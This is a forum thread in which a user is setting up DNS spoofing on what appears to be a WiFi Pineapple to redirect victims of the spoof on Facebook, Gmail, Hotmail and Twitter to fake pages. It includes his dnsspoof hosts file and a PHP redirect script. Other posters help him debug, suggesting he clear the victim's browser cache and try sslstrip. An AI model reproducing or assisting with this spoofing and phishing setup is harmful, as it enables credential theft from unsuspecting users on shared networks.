How to spoof multiple webs at same time with DNSSPOOF

[daniboy92]

Hi,

After try and try to have a dnsspoof working service i have it.

Now i'm trying to spoof multiple webs (facebook, twitter, gmail, hotmail, ebay... etc), but only i can spoof one web, only works with Facebook...

Is there a code on browsers or OS that block spoofing web pages?

This is my dnsspoof's hosts file:

172.16.42.1 example.com

172.16.42.1 *.facebook.*

172.16.42.1 *.gmail.*

172.16.42.1 *.hotmail.*

172.16.42.1 *.twitter.*

And this is my redirect file:

<?php

$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

if (strpos($ref, "example")){

header('Status: 302 Found');

header('Location: example.html');

}

if (strpos($ref, "facebook")){

header('Status: 302 Found');

header('Location: facebookES');

}

if (strpos($ref, "gmail")){

header('Status: 302 Found');

header('Location: gmailES');

}

if (strpos($ref, "hotmail")){

header('Status: 302 Found');

header('Location: hotmailES');

}

if (strpos($ref, "twitter")){

header('Status: 302 Found');

header('Location: twitterES');

}

require('error.php');

?>

The files aren't htm or html, there are shorcuts to the real htm files... But this is not the problem.

I don't know if there is something wrong in my Redirect.php file, my hosts file or it's a problem to prevents pineapple spoof varius webs at same time...

Edited July 11, 2014 by daniboy92

[GnomeProgramming]

Try to clean the browser cache of the victim machine and try again. Some times happens to me when the SSL connection is already stablished before I start dnsspoof.

Good luck~

Edited July 11, 2014 by GnomeProgramming

[daniboy92]

Try to clean the browser cache of the victim machine and try again. Some times happens to me when the SSL connection is already stablished before I start dnsspoof.

Good luck~

I deleted all: cookies, cache, history, downloads... All i can clean in the browser...

But only can spoof Facebook.com and example.com

Edited July 11, 2014 by daniboy92

[GnomeProgramming]

Try this:

if (strpos($ref, "gmail")){
                 header('Status: 302 Found');
                 header('Location: http://www.yolo.com');
                 }

And if It doesn't work try to redirect a website that doesn't use SSL

OR/AND

try this: https://forums.hak5.org/index.php?/topic/32982-dnsspoof-doesnt-redirect/?p=246490

Edited July 11, 2014 by GnomeProgramming

[daniboy92]

Ok, tried to do this:

if (strpos($ref, "gmail")){
header('Status: 302 Found');
header('Location: http://www.yolo.com');
}

It doesn't work with gmail, but works fine with marca.com...

I think it's because gmail use SSL, someone knows how to use sslstrip with dnsspoof?

Edited July 13, 2014 by daniboy92

[daniboy92]

Can someone make a tutorial for use dnsspoof and sslstrip at same time?

[cheeto]

ssl strip isn't very effective anymore due to HSTS.

As far as I know it doesn't work with:

gmail

yahoo mail

Hotmail.

Last time I tried it did work with Facebook though.

A video tutorial would be more than welcomed though.

[daniboy92]

Thanks cheeto, but i can't spoof webs with ssl protection. I want to remove ssl with sslstrip and try to spoof them.

Personally I can't spoof webs like Gmail, Hotmail, PayPal, Ebay... Only Facebook that use ssl.

Tell me if you can.